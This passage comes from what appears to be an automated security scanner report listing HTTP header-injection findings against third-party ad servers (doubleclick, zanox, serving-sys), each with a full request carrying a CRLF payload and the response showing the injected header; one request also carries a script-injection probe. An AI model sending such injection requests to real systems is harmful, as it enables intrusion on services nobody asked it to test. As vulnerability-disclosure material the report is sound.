Referer: http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2818894/957634/15009,2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/14c2c
b2351d233db
/N553.158901.DATAXU/B4970757.11%3Bsz%3D468x60%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D%5Btimestamp%5D:
Date: Sat, 05 Feb 2011 21:49:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.12. http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.158901.DATAXU/B4970757.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 42c36%0d%0abbd914c4d3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /42c36%0d%0abbd914c4d3b/N553.158901.DATAXU/B4970757.11 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/42c36
bbd914c4d3b
/N553.158901.DATAXU/B4970757.11:
Date: Sat, 05 Feb 2011 21:50:28 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

3.13. http://ad.doubleclick.net/adj/entzd.base/itmanagement [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/entzd.base/itmanagement

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 75aa0%0d%0a89c0f58a50b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /75aa0%0d%0a89c0f58a50b/entzd.base/itmanagement HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/75aa0
89c0f58a50b
/entzd.base/itmanagement:
Date: Sun, 06 Feb 2011 17:17:44 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

3.14. http://ad.doubleclick.net/adj/oiq.man.homeappliance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/oiq.man.homeappliance/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 80fc5%0d%0a18367c4310e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /80fc5%0d%0a18367c4310e/oiq.man.homeappliance/;mfg=145;tile=1;sz=720x90,728x90;ord=1296942753;u=mfg_145%7Csid_ HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/80fc5
18367c4310e
/oiq.man.homeappliance/%3Bmfg%3D145%3Btile%3D1%3Bsz%3D720x90%2C728x90%3Bord%3D1296942753%3Bu%3Dmfg_145%7Csid_:
Date: Sat, 05 Feb 2011 22:27:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.15. http://ad.doubleclick.net/jump/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N553.158901.DATAXU/B4970757.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 56f15%0d%0a1b7eaef4d04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /56f15%0d%0a1b7eaef4d04/N553.158901.DATAXU/B4970757.11 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/56f15
1b7eaef4d04
/N553.158901.DATAXU/B4970757.11:
Date: Sat, 05 Feb 2011 21:50:29 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

3.16. http://ad.zanox.com/tpv/ [14786739C435671106&ULP parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.zanox.com
Path:   /tpv/

Issue detail

The value of the 14786739C435671106&ULP request parameter is copied into the Location response header. The payload d2ed0%0d%0acf60b7507b4 was submitted in the 14786739C435671106&ULP parameter. This caused a response containing an injected HTTP header.

Request

GET /tpv/?14786739C435671106&ULP=d2ed0%0d%0acf60b7507b4&zpar0=125_1_728x90_360_pvc_ad4matdedault HTTP/1.1
Host: ad.zanox.com
Proxy-Connection: keep-alive
Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 06 Feb 2011 17:39:07 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP"
X-Powered-By: ASP.NET
Set-Cookie: zttpvc=5C114178S1469386944579519491T0I14786739C0T0; domain=.zanox.com; path=/
Set-Cookie: zptpvc=5C114178S1469386944579519491T0I14786739C0T0; expires=Sat, 07-May-2011 17:39:07 GMT; domain=.zanox.com; path=/
Content-Length: 0
Location: http://www.bild.ded2ed0
cf60b7507b4
&zpar0=125_1_728x90_360_pvc_ad4matdedault?zanpid=14786739C435671106T1469386944579519491
pragma: no-cache
cache-control: no-store


3.17. http://ad.zanox.com/tpv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.zanox.com
Path:   /tpv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 96c36%0d%0a1e76b109467 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /tpv/?14786739C435671106&ULP=http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&96c36%0d%0a1e76b109467=1 HTTP/1.1
Host: ad.zanox.com
Proxy-Connection: keep-alive
Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 06 Feb 2011 17:40:04 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP"
X-Powered-By: ASP.NET
Set-Cookie: zttpvc=5C322704S1469387185567450118T0I14786739C0T0; domain=.zanox.com; path=/
Set-Cookie: zptpvc=5C322704S1469387185567450118T0I14786739C0T0; expires=Sat, 07-May-2011 17:40:04 GMT; domain=.zanox.com; path=/
Content-Length: 0
Location: http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&96c36
1e76b109467
=1&zanpid=14786739C435671106T1469387185567450118
pragma: no-cache
cache-control: no-store


3.18. http://ad.zanox.com/tpv/ [zpar0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.zanox.com
Path:   /tpv/

Issue detail

The value of the zpar0 request parameter is copied into the Location response header. The payload 8b1c7%0d%0aa5975a40bc was submitted in the zpar0 parameter. This caused a response containing an injected HTTP header.

Request

GET /tpv/?14786739C435671106&ULP=http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=8b1c7%0d%0aa5975a40bc HTTP/1.1
Host: ad.zanox.com
Proxy-Connection: keep-alive
Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ztvc=5C357927S1469378102382598159T0I14786739C0T0; zpvc=5C357927S1469378102382598159T0I14786739C0T0

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 06 Feb 2011 17:39:12 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP"
X-Powered-By: ASP.NET
Set-Cookie: zttpvc=5C127423S1469386967060988934T0I14786739C0T0; domain=.zanox.com; path=/
Set-Cookie: zptpvc=5C127423S1469386967060988934T0I14786739C0T0; expires=Sat, 07-May-2011 17:39:12 GMT; domain=.zanox.com; path=/
Content-Length: 0
Location: http://www.zanox-affiliate.de/tpv/?11259580C1463786597S14786739T&zpar0=8b1c7
a5975a40bc
&zanpid=14786739C435671106T1469386967060988934
pragma: no-cache
cache-control: no-store


3.19. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 803fb%0d%0a71e6bfcf0d1 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0803fb%0d%0a71e6bfcf0d1; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=0803fb
71e6bfcf0d1
; expires=Sat, 07-May-2011 12: 18:54 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz01g; expires=Sat, 07-May-2011 12:18:54 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 17:18:54 GMT
Connection: close


3.20. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 3b588%0d%0ae9f2ac9bef5 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=03b588%0d%0ae9f2ac9bef5; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.7FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz010; C4=; ActivityInfo=000p81bCx%5f; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.359340&debuglevel=&FLV=10.1103&RES=128&WMPV=03b588
e9f2ac9bef5
; expires=Sat, 07-May-2011 12: 18:54 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=1f5940fe-c0d1-459f-8c91-e4475c881fca3Gz01g; expires=Sat, 07-May-2011 12:18:54 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 17:18:54 GMT
Connection: close


3.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the bwVal request parameter is copied into the Set-Cookie response header. The payload c3e38%0d%0aea51dd9334e was submitted in the bwVal parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4363488~~0~~~^ebAdDuration~10~0~01020^ebAboveTheFoldDuration~9~0~01020^ebAboveTheFold~0~0~01020|4443510~~0~~~^ebAdDuration~1~0~01020^ebAboveTheFoldDuration~1~0~01020^ebAboveTheFold~0~0~01020&OptOut=0&ebRandom=0.8359781634062529&flv=10.1103&wmpv=0&res=128&bwVal=c3e38%0d%0aea51dd9334e&bwTime=1296998548216 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Origin: http://www.baselinemag.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=152b62bf-e208-4574-99e3-64f5d04be4b73Gz050; expires=Sat, 07-May-2011 08:22:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=c3e38
ea51dd9334e
&BWDate=40580.348634&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 07-May-2011 08: 22:02 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 13:22:01 GMT
Connection: close
Content-Length: 0


3.22. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload b9a93%0d%0afca8ffe0901 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117121&PluID=0&e=0&w=728&h=90&ord=7582024&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/3/0/%2a/m%3B235470018%3B0-0%3B0%3B23542470%3B3454-728/90%3B40150909/40168696/1%3Bu%3Dzdtopic%3Ditmanagement|zdtopic%3Denterprise|zdtopic%3Dintelligence|zdid%3Da6280|zdtype%3Darticle|zdaudience%3D|zdproduct%3D|zdcompany%3D|zdpagetype%3D%3B%7Eaopt%3D2/0/73/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0b9a93%0d%0afca8ffe0901; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0b9a93
fca8ffe0901
; expires=Sat, 07-May-2011 08: 21:37 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gLnTaeKR09sO00001h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001gL2MadKj0bdR00001fU+La50V0a+r00001h802ae7k0c6L00001gKXMaepH0bdR00001gKXNaepP0bdR00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001gNQ4ae7r0c9M00001ge4Hack+0bM000001; expires=Sat, 07-May-2011 08:21:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57dNH0000000002sZ8qav0000000001t57GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t384U10000000001t6852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 07-May-2011 08:21:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 07-May-2011 08:21:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 13:21:37 GMT
Connection: close
Content-Length: 2841

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

3.23. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 131a5%0d%0ad2c2e010a34 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=131a5%0d%0ad2c2e010a34&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Origin: http://www.baselinemag.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=b7b7b2ef-33ea-42bf-9135-a5d225ccd4143Gz050; expires=Sat, 07-May-2011 08:21:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=131a5
d2c2e010a34
&RES=128&WMPV=0; expires=Sat, 07-May-2011 08: 21:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 06 Feb 2011 13:21:33 GMT
Connection: close
Content-Length: 0


3.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 46baf%0d%0a393469f66ab was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4388343~~0~~~^ebBelowTheFold~0~0~01020&OptOut=0&ebRandom=0.06774244247935712&flv=10.1103&wmpv=0&res=46baf%0d%0a393469f66ab HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Origin: http://www.baselinemag.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
